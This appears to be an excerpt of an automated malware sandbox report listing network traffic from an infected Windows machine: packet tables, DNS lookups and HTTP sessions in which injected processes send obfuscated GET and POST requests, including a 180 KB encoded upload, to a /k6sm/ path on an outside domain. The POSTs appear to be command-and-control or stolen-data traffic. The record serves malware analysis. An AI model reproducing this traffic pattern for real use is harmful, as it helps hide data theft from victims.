                                                          Jan 24, 2022 15:47:32.820287943 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.820291996 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.820328951 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.820348978 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.820389986 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.822065115 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.822088957 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:49:11.722908020 CET4984680192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:11.858048916 CET8049846108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:11.858344078 CET4984680192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:11.858871937 CET4984680192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:11.992732048 CET8049846108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:11.992769003 CET8049846108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:11.992978096 CET8049846108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:11.993170023 CET4984680192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:11.993185997 CET4984680192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:12.126693964 CET8049846108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.002753973 CET4984780192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.138273954 CET8049847108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.140500069 CET4984780192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.140559912 CET4984780192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.140571117 CET4984780192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.141036034 CET4984880192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.275955915 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.275995016 CET8049847108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.276096106 CET4984880192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.276202917 CET8049847108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.276218891 CET8049847108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.276448965 CET4984780192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.276480913 CET4984780192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.279300928 CET4984880192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.414422035 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.414447069 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.414454937 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.414465904 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.414473057 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.414484978 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.414493084 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.414525032 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.414570093 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.414664030 CET4984880192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.414716005 CET4984880192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.549694061 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.549716949 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.549725056 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.549736023 CET8049848108.175.14.116192.168.2.6
                                                          Jan 24, 2022 15:49:14.549860954 CET4984880192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.549890041 CET4984880192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.549892902 CET4984880192.168.2.6108.175.14.116
                                                          Jan 24, 2022 15:49:14.549896002 CET4984880192.168.2.6108.175.14.116

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 24, 2022 15:47:31.089723110 CET5181853192.168.2.68.8.8.8
                                                          Jan 24, 2022 15:47:31.121912956 CET53518188.8.8.8192.168.2.6
                                                          Jan 24, 2022 15:48:49.848598957 CET5932953192.168.2.68.8.8.8
                                                          Jan 24, 2022 15:48:50.253261089 CET53593298.8.8.8192.168.2.6
                                                          Jan 24, 2022 15:48:52.316118002 CET6402153192.168.2.68.8.8.8
                                                          Jan 24, 2022 15:48:52.593650103 CET53640218.8.8.8192.168.2.6
                                                          Jan 24, 2022 15:48:52.603938103 CET5612953192.168.2.68.8.8.8
                                                          Jan 24, 2022 15:48:52.907799959 CET53561298.8.8.8192.168.2.6
                                                          Jan 24, 2022 15:49:11.690753937 CET5817753192.168.2.68.8.8.8
                                                          Jan 24, 2022 15:49:11.713663101 CET53581778.8.8.8192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Jan 24, 2022 15:47:31.089723110 CET192.168.2.68.8.8.80x2acbStandard query (0)www.bulkwhatsappsender.inA (IP address)IN (0x0001)
                                                          Jan 24, 2022 15:48:49.848598957 CET192.168.2.68.8.8.80x29ddStandard query (0)www.yzicpa.comA (IP address)IN (0x0001)
                                                          Jan 24, 2022 15:48:52.316118002 CET192.168.2.68.8.8.80xcc68Standard query (0)www.yzicpa.comA (IP address)IN (0x0001)
                                                          Jan 24, 2022 15:48:52.603938103 CET192.168.2.68.8.8.80x1b42Standard query (0)www.yzicpa.comA (IP address)IN (0x0001)
                                                          Jan 24, 2022 15:49:11.690753937 CET192.168.2.68.8.8.80x548cStandard query (0)www.dentalbatonrouge.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Jan 24, 2022 15:47:31.121912956 CET8.8.8.8192.168.2.60x2acbNo error (0)www.bulkwhatsappsender.inbulkwhatsappsender.inCNAME (Canonical name)IN (0x0001)
                                                          Jan 24, 2022 15:47:31.121912956 CET8.8.8.8192.168.2.60x2acbNo error (0)bulkwhatsappsender.in151.106.117.33A (IP address)IN (0x0001)
                                                          Jan 24, 2022 15:48:50.253261089 CET8.8.8.8192.168.2.60x29ddName error (3)www.yzicpa.comnonenoneA (IP address)IN (0x0001)
                                                          Jan 24, 2022 15:48:52.593650103 CET8.8.8.8192.168.2.60xcc68Name error (3)www.yzicpa.comnonenoneA (IP address)IN (0x0001)
                                                          Jan 24, 2022 15:48:52.907799959 CET8.8.8.8192.168.2.60x1b42Name error (3)www.yzicpa.comnonenoneA (IP address)IN (0x0001)
                                                          Jan 24, 2022 15:49:11.713663101 CET8.8.8.8192.168.2.60x548cNo error (0)www.dentalbatonrouge.com108.175.14.116A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • www.bulkwhatsappsender.in
                                                          • www.dentalbatonrouge.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.649820151.106.117.33443C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.649846108.175.14.11680C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 24, 2022 15:49:11.858871937 CET10321OUTGET /k6sm/?d48pAVX=VId1XGgV51+banGxzL0dUPYEUmU95ttpJOMZNiN8gg3/S9FPXBDAGWpY0ehao+dqxo0M4PI93Q==&8pnDfl=Lb3tdB30pX2 HTTP/1.1
                                                          Host: www.dentalbatonrouge.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Jan 24, 2022 15:49:11.992769003 CET10321INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Mon, 24 Jan 2022 14:49:11 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.dentalbatonrouge.com/k6sm/?d48pAVX=VId1XGgV51+banGxzL0dUPYEUmU95ttpJOMZNiN8gg3/S9FPXBDAGWpY0ehao+dqxo0M4PI93Q==&8pnDfl=Lb3tdB30pX2
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.649847108.175.14.11680C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 24, 2022 15:49:14.140559912 CET10322OUTPOST /k6sm/ HTTP/1.1
                                                          Host: www.dentalbatonrouge.com
                                                          Connection: close
                                                          Content-Length: 417
                                                          Cache-Control: no-cache
                                                          Origin: http://www.dentalbatonrouge.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.dentalbatonrouge.com/k6sm/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 64 34 38 70 41 56 58 3d 64 71 52 50 4a 68 70 75 38 57 57 61 4c 41 58 66 67 76 45 42 4c 5a 74 69 62 45 49 77 30 4d 42 38 58 62 42 42 51 69 46 6c 68 53 54 6b 57 4d 68 48 64 55 79 71 4a 68 6f 45 71 75 46 6d 70 4f 4e 55 33 6f 45 50 31 2d 4d 61 75 43 4b 6e 57 6f 49 69 66 72 70 31 6c 59 47 4a 39 30 28 5f 61 62 70 6a 35 65 61 4b 44 43 30 59 30 43 28 37 6a 32 35 4f 4a 7a 49 49 68 76 65 61 57 38 4c 48 77 47 31 6f 58 57 51 76 62 35 61 51 49 4f 76 37 4c 6c 79 37 34 61 68 30 32 71 43 32 70 4b 72 67 4c 61 55 70 78 44 73 37 72 43 31 69 39 42 34 76 58 4e 49 43 58 63 64 70 49 64 4c 4b 4d 6f 62 52 64 32 31 6b 6d 6c 30 67 78 43 6f 31 4e 5a 45 76 44 54 36 46 6d 62 35 64 70 61 42 58 77 62 30 66 42 78 78 4b 6a 39 4d 30 43 71 44 6a 6f 56 68 47 4c 7a 4b 48 68 44 34 37 64 65 42 51 76 2d 4c 4c 45 37 49 57 73 54 6a 46 6b 6c 69 2d 52 47 43 38 56 45 70 57 54 46 67 46 72 76 4f 69 65 43 50 75 4e 62 77 61 34 66 61 71 57 4e 4e 6f 36 4d 74 6f 77 57 4f 73 66 30 52 4d 6c 43 6c 34 52 67 6f 76 41 2d 6d 6f 34 44 72 42 48 6f 7e 4d 4b 4a 61 37 41 44 50 68 68 32 4f 50 6a 72 31 50 70 44 67 38 55 70 4e 57 6a 4b 73 6f 35 41 38 51 62 70 48 49 28 46 6f 4c 37 37 7e 47 70 48 30 56 49 67 73 64 4f 5f 59 77 31 51 54 4c 65 5f 54 71 43 39 76 6a 63 7a 48 75 35 76 56 4b 65 52 45 2e 00 00 00 00 00 00 00 00
                                                          Data Ascii: d48pAVX=dqRPJhpu8WWaLAXfgvEBLZtibEIw0MB8XbBBQiFlhSTkWMhHdUyqJhoEquFmpONU3oEP1-MauCKnWoIifrp1lYGJ90(_abpj5eaKDC0Y0C(7j25OJzIIhveaW8LHwG1oXWQvb5aQIOv7Lly74ah02qC2pKrgLaUpxDs7rC1i9B4vXNICXcdpIdLKMobRd21kml0gxCo1NZEvDT6Fmb5dpaBXwb0fBxxKj9M0CqDjoVhGLzKHhD47deBQv-LLE7IWsTjFkli-RGC8VEpWTFgFrvOieCPuNbwa4faqWNNo6MtowWOsf0RMlCl4RgovA-mo4DrBHo~MKJa7ADPhh2OPjr1PpDg8UpNWjKso5A8QbpHI(FoL77~GpH0VIgsdO_Yw1QTLe_TqC9vjczHu5vVKeRE.
                                                          Jan 24, 2022 15:49:14.276202917 CET10323INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Mon, 24 Jan 2022 14:49:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.dentalbatonrouge.com/k6sm/
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.649848108.175.14.11680C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 24, 2022 15:49:14.279300928 CET10336OUTPOST /k6sm/ HTTP/1.1
                                                          Host: www.dentalbatonrouge.com
                                                          Connection: close
                                                          Content-Length: 180913
                                                          Cache-Control: no-cache
                                                          Origin: http://www.dentalbatonrouge.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.dentalbatonrouge.com/k6sm/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 64 34 38 70 41 56 58 3d 64 71 52 50 4a 67 51 66 77 47 53 4c 4d 32 48 65 79 62 68 4e 41 36 30 39 66 48 4d 6a 77 63 35 6f 61 72 74 52 51 69 30 69 73 77 37 36 64 4d 78 48 62 52 47 74 44 68 6f 4c 73 75 46 68 7e 2d 42 46 36 66 41 48 31 38 67 38 75 44 79 6b 50 62 51 6a 66 62 70 63 6c 34 61 6c 70 45 36 36 61 5a 74 4b 34 39 32 53 57 79 77 59 74 32 54 39 28 44 64 56 4f 78 73 54 76 37 7e 6c 55 35 65 5a 7a 78 45 58 52 7a 34 5a 4e 74 43 57 44 63 7a 73 48 45 43 48 75 74 31 4e 34 65 71 39 71 4c 76 7a 47 59 77 74 77 77 31 59 32 7a 30 51 33 52 67 78 42 61 6b 4b 64 4e 4a 41 62 64 36 35 4d 6f 6a 42 55 6c 51 69 69 6d 51 65 7a 54 55 50 59 34 77 68 64 77 44 41 69 59 42 67 36 4a 49 50 76 75 49 50 46 67 4d 49 69 5f 6b 6b 59 2d 4f 56 71 42 78 38 66 79 36 37 6a 55 59 7a 41 4f 78 76 68 64 72 63 4b 49 41 65 70 52 50 5a 71 6c 69 64 54 47 44 39 66 6e 68 75 59 30 6b 61 7e 66 28 44 65 46 54 2d 58 62 63 42 35 5a 53 45 4c 35 46 6c 32 63 78 6b 37 7a 6a 4d 4a 7a 68 48 69 68 34 54 62 41 70 67 64 73 7e 5f 34 44 71 2d 48 70 7e 71 4d 34 7e 37 44 79 76 55 78 42 79 54 68 72 31 53 76 51 49 2d 4e 72 59 62 6a 4f 34 6f 6a 53 6c 33 62 65 62 49 36 57 67 45 36 61 7e 47 6f 58 30 56 4f 67 74 38 48 4e 64 45 31 51 79 34 58 61 53 4c 54 50 6a 67 58 6b 79 64 74 50 70 65 63 55 38 65 41 73 6c 79 58 75 4c 37 7e 76 53 52 73 37 52 71 30 4c 4c 4d 41 49 65 52 7e 68 75 58 58 59 6d 77 59 48 47 69 49 73 5a 68 69 73 44 57 62 35 63 6a 4e 6b 62 4c 46 63 5a 61 73 58 6d 58 7e 6a 76 54 43 76 6d 44 35 76 65 6f 42 35 76 74 44 6a 33 37 79 54 77 31 78 75 58 2d 4e 38 6e 6d 6d 59 69 69 53 64 42 62 67 77 7a 6f 59 4a 55 50 67 45 42 4d 68 58 4c 50 77 43 67 52 36 64 64 49 4f 2d 79 56 77 38 53 2d 50 78 56 6b 44 55 48 75 31 41 34 43 67 69 35 6b 79 76 52 79 4e 50 45 4c 39 2d 78 46 7e 6a 75 4d 71 6b 6d 43 6a 75 30 43 32 56 42 46 74 47 47 56 54 5a 47 46 6c 72 54 30 70 6a 6f 56 56 73 38 58 6f 52 78 76 41 72 36 72 73 77 48 6d 75 38 6d 67 63 32 32 73 34 6b 62 41 77 55 41 75 35 69 44 4d 74 6c 55 6f 28 45 4e 48 56 42 68 77 31 44 6b 4e 47 4f 74 44 54 7a 47 71 6c 6e 63 75 39 61 4f 73 4f 58 47 4a 37 31 48 4f 63 2d 77 31 66 7a 28 72 47 59 6f 50 4e 70 34 52 38 44 48 48 6d 38 41 6e 36 34 51 64 6d 49 62 4c 75 54 76 47 59 35 63 42 54 54 4f 73 31 6b 58 37 54 30 7a 64 62 38 69 44 59 51 6f 45 7a 54 4f 31 44 6f 35 52 46 59 77 57 33 6c 48 6d 74 51 76 50 39 38 38 5f 75 69 55 43 75 69 48 4d 64 6e 47 6c 4b 77 74 51 73 46 6f 4e 39 4e 74 78 4c 34 34 6e 7a 57 28 4c 58 43 4a 72 77 77 4f 55 51 59 4e 43 78 61 4d 56 52 55 49 4a 56 6c 63 6f 48 39 70 51 57 4e 75 33 51 4e 4e 46 68 4f 30 49 66 66 46 74 55 69 59 5a 39 76 33 38 4b 79 76 76 68 33 78 56 39 79 75 59 4b 72 6f 4e 62 48 33 54 68 41 64 6a 78 33 46 65 51 4e 74 36 56 6b 46 78 39 58 7e 73 70 7a 42 56 4d 55 67 63 34 5f 7a 76 52 72 65 69 7e 47 31 74 49 39 38 71 35 70 6e 4a 6b 68 53 59 64 39 28 55 35 49 36 4c 64 54 48 6d 46 44 62 47 57 30 37 47 7a 76 7a 71 4e 74 74 44 77 34 73 58 47 37 69 59 49 76 61 4a 37 72 4c 74 47 77 4b 46 4f 6a 34 6a 79 76 37 4d 67 47 4f 73 63 43 74 68 56 63 35 74 34 50 31 57 43 4e 36 63 76 31 4e 64 58 48 55 35 42 57 43 59 58 72 28 79 63 7a 45 75 4a 31 78 61 42 5f 59 4c 47 79 43 64 47 33 73 5f 32 43 58 61 4f 31 6b 77 65 39 42 45 6b 76 37 49 42 4c 43 46 69 78 7a 39 77 4e 4f 72 52 4c 42 6a 6f 69 42 4c 6b 53 43 6e 61 70 36 69 6d 57 6e 31 45 33 33 4e 77 55 4e 46 41 6a 43 32 31 78 31 75 54 42 58 35 5a 30 59 6f 73 45 68 57 6b 69 30 38 62 45 32 63 79 5a 61 48 4f 70 78 76 44 49 38 66 31 43 36 6b 69 44 71 59 30 47 44 44 66 76 52 44 46 66 41 36 61 49 28 6c 65 2d 36 4d 7e 68 39 70 48 52 65 65 37 67 6d 55 30 53 76 44 38 38 6d 56 47 6f 71 6f 64 6b 6c 55 51 42 34 48 55 65 6a 62 59 4d 46 54 39 30 68 31 4b 50 33 74 4c 61 71 71 50 32 44 57 5a 50 42 43 44 79 35 51 4c 34 42 6b 28 45 48 35 63 6c 4e 51 54 71 35 7a 44 45 4a 66 57 63 48 6d 4d 50 6b 55 30 46 6c 45 67 71 6f 77 4b 73 73 72 70 4b 66 6b 4d 37 62 43 44 4e 38 52 75 54 67 57 42 4f 79 50 4c 44 74 2d 54 79 58 7a 55 76 43 6c 30 64 42 62 61 64 67 50 35 73 65 64 59 5f 51 5a 6f 4c 47 55 77 62 53 2d 69 73 74 32 4f 33 41 66 52 53 5a 6e 6b 75 76 57 34 76 4f 68 33 71 35 2d 44 7a 28 6c 34 54 51 4a 6e 36 73 37 53 49 6a 51 4a 4e 73
                                                          Data Ascii: d48pAVX=dqRPJgQfwGSLM2HeybhNA609fHMjwc5oartRQi0isw76dMxHbRGtDhoLsuFh~-BF6fAH18g8uDykPbQjfbpcl4alpE66aZtK492SWywYt2T9(DdVOxsTv7~lU5eZzxEXRz4ZNtCWDczsHECHut1N4eq9qLvzGYwtww1Y2z0Q3RgxBakKdNJAbd65MojBUlQiimQezTUPY4whdwDAiYBg6JIPvuIPFgMIi_kkY-OVqBx8fy67jUYzAOxvhdrcKIAepRPZqlidTGD9fnhuY0ka~f(DeFT-XbcB5ZSEL5Fl2cxk7zjMJzhHih4TbApgds~_4Dq-Hp~qM4~7DyvUxByThr1SvQI-NrYbjO4ojSl3bebI6WgE6a~GoX0VOgt8HNdE1Qy4XaSLTPjgXkydtPpecU8eAslyXuL7~vSRs7Rq0LLMAIeR~huXXYmwYHGiIsZhisDWb5cjNkbLFcZasXmX~jvTCvmD5veoB5vtDj37yTw1xuX-N8nmmYiiSdBbgwzoYJUPgEBMhXLPwCgR6ddIO-yVw8S-PxVkDUHu1A4Cgi5kyvRyNPEL9-xF~juMqkmCju0C2VBFtGGVTZGFlrT0pjoVVs8XoRxvAr6rswHmu8mgc22s4kbAwUAu5iDMtlUo(ENHVBhw1DkNGOtDTzGqlncu9aOsOXGJ71HOc-w1fz(rGYoPNp4R8DHHm8An64QdmIbLuTvGY5cBTTOs1kX7T0zdb8iDYQoEzTO1Do5RFYwW3lHmtQvP988_uiUCuiHMdnGlKwtQsFoN9NtxL44nzW(LXCJrwwOUQYNCxaMVRUIJVlcoH9pQWNu3QNNFhO0IffFtUiYZ9v38Kyvvh3xV9yuYKroNbH3ThAdjx3FeQNt6VkFx9X~spzBVMUgc4_zvRrei~G1tI98q5pnJkhSYd9(U5I6LdTHmFDbGW07GzvzqNttDw4sXG7iYIvaJ7rLtGwKFOj4jyv7MgGOscCthVc5t4P1WCN6cv1NdXHU5BWCYXr(yczEuJ1xaB_YLGyCdG3s_2CXaO1kwe9BEkv7IBLCFixz9wNOrRLBjoiBLkSCnap6imWn1E33NwUNFAjC21x1uTBX5Z0YosEhWki08bE2cyZaHOpxvDI8f1C6kiDqY0GDDfvRDFfA6aI(le-6M~h9pHRee7gmU0SvD88mVGoqodklUQB4HUejbYMFT90h1KP3tLaqqP2DWZPBCDy5QL4Bk(EH5clNQTq5zDEJfWcHmMPkU0FlEgqowKssrpKfkM7bCDN8RuTgWBOyPLDt-TyXzUvCl0dBbadgP5sedY_QZoLGUwbS-ist2O3AfRSZnkuvW4vOh3q5-Dz(l4TQJn6s7SIjQJNsSTkykS9ZhfqJa~VijKQoFPhuUo-BRtNcb1RMeagsYu8MTevuHl2i2BICN~Vhk353OObvVkAZ7PEeAnQv1UhwegxfKGdkqdtPH2VoagOmGUYf9qsHJxAti~9Nli0hP8whNBrYsBry7QMqIxSLIjGEpijyPPyn4wmGhGh2EFdodOzptAspcEvD7SkArsslYu7R0~gKDMPt18NcAOJBHV_zFySbmOyvxo0QnNswDwffmI7MLM9t5Lf1qC18Cv-U_D3pRFwyGKLnzqrLPp8xkKY4_kK8kdj7QrBaLHNh8dDo1vLV50c7qvOuo52d5SA82h418T51gchHqzQciJCI3nYyf2i15pb(hoy6NunG4kEzYfT8fZPUcq_ex2UNMeZdSrtruift05hUJD0IqPyCWDP(P9nVHTtPHh1e0fqbptvQ9JZg8B_wP3MVdkeTDUBqug5O0sZp_e2Xw1_ldluXQOM3y1xfgh4qYfZKy5Mowls1wDniP0On0lbYvQMbmmsfSwrvkxoCM~BffeQO73nBHGUPrw9dapW0DCFIt9Y4dx6BkvaLb7PfonaoJn1MaPm34V6hYC7XuhWT0rsX6DeMkIKoqoCd5ZZmDWORoWd6ggmKaAGkABKI3v5j5K3uTMXVR2VoZx1zmKP(FRdx3GeroHLeSooF86cTERL39IJYwkL0mVhhvfljgstpzzyVm0BtFlQnlzZZ-fvDknpUYMH2CGiXIeIIH1kCRlNP22si6XWg7D8Y9q1pMUNclBGHijhxIT_pj37dTbvCBznI2dP0suh8BlnuAsL8_1YaMd5Brdh1336o7bf0HKv4GB6B4FoaTikut(bl-JQwGaGPN~xVF(Kh_HjQvCYhT0_8ckPpn1r6RXXSv9yX28uPtMXaFuWtJIe0vkAEugvhKjcA2j8oWj50OPw5EMX8Cwg9IYqJLyt3uefBB5Viz1hmqWAhbXe3G2RfX~iAhYr7JY4nMGXec42i5BgrVjxmy7QgKNeeh9O2Bbu8cpXr_8XPlMBF4LNY3ECuZVZKa64bIisFv7_t2DX3HC4q_sTrXKNm_l3iHs9vupcgZhVNrSOsj478aJ8lyOAO4dQt1Ov8hPu4iqgkCTcemXomHcDQwukK5QRDRryV0AuObppX0vbVYzO97U43Y6YHAHjh7HS63dyPHqR8ljxjLMO(2pam4ZsRdVB1_WeUZ2fZB~j65dDq-L_UuQ9oJB5k5Cud6tMnKFtcxarQHGPLUg9Smm5~UTz23e4XEMqZUNP3M7mLVW6T4DvU_2IFlXiXRh-TuLyJBH6nlSOC7zJ46LW(29jJYcrUdqmD9Egh7zLejqGoPcuZHnT2awnVJSYdbssOhom2xlxUraxy72uh1FtL8H2h-XRw1ndczAgR59ET8jUZWmWmbPEYMaEwMSiU3uaB4utTL6Jt9fbUIQRcAtmPeMbatETYzG8PlL8KIIXZN55SkJOM_647P7wHbxNPO3G8ywoIi9dBTMoQHv-HaoF4T2Evot609qXbkAO551o6kFPQryleLCw8O6BTLOMmnd01eMnOcPJaPyVANulcRbND_kqdzymDtW9ci2vLE5DAmydHt1hpy4rvIC0(uq5l5jgvRnqhaleJCYFnBQcMOZI(weRZWCjIP2KsTV5V0gOAKIeKFgS(OB6hklCkSuifNZXxtKtsJsjlB2Lnm6N5ZhwPVRnuV5Hcj1AogwmM5A9FAOdFD4_Y-1jNYq_b9OiAHHohCo12m(_l2NSX7bzohZlMzQD62q2M8fdmasKwaZS(u4TVJ~WB2CzzMN-ZJecb5rElUyUeKOY14NldKfNoDMIJkOHBMKCt3YrmKdPf-bYXWBYRZi-hyMOdmrHD3X_Fp2doVjSOwRBJi8a6AzA9zSuFzSICrYcZeAnKHC80xMD2ckRO1LlzcjrgaGOCv0tdgrpsFk4~rc-KitilZYjJBxasVQMvjHZsGiKPEg-06n_v8mwkdce7dnKn1mDswWsbHuvfBPI2sc0qJxjhgepmMkX3ezJpUGioe54QrLdlGWcnJ0rJ-KLPnIQ29iG~F8yFo(xJT8bakbnb249FeBrbKXQihFxu3jszge4RO1ocQlGv3SJkwGSHxpLjaaN37WGDe0LV7d04R~GFte0eXdcWVIlioZQRwoqw7Fc2nYvA-hJ2jwOpJgKDaafKdIFYgMhwS(lwRSbDDpBTw~STknIs4lF3N2D8tIR8rqt1cS2RIYcMNJSkp94D1drVnAFx9nmhhIVifN1JWwzm38eSzRh2dS7urJkLA4B2kIGFnMjmf~5wcR05dOEFYvC1RIcIcZUNDc8nbT8ozzTreDrYj2oIBlVvn95alZ1q4WOa6Xkg5nJH95H1ydOKzCS3B4ZLo35TsIo1ttdYsO4hpsZayR3be8gSCK9t6kAO7BEyMWIryJ1NzFk(nOghUdgoMxa9Wk7Z0~u7MkaNGTLvGWFvxlUf6ED6RGyAnQs0mjh6dMgexIjlK1udzrcxr(n6-lYAQzGSQo-SiWN75nmnDP-tIKWCk8ozvZcqWoqJ0~3HbyuAcBZZjhu7cHNqutHsWy27KamNmAYFuCSd5f-f5jM4EkM03u0eqgO~Hr-wjA8KMT5SdyQPSIb(DQUuHdpqmqySZCv~jEYNtVrzMYPZHX3m3w0RXXQptjAiYN6GByYwWEWh39dLRXTpiQ61cEfCl5LuLWItzHC0IQJp98xRKVx~xVG7DP5YRH-UagX(5qJ
                                                          Jan 24, 2022 15:49:14.414570093 CET10337INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Mon, 24 Jan 2022 14:49:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.dentalbatonrouge.com/k6sm/
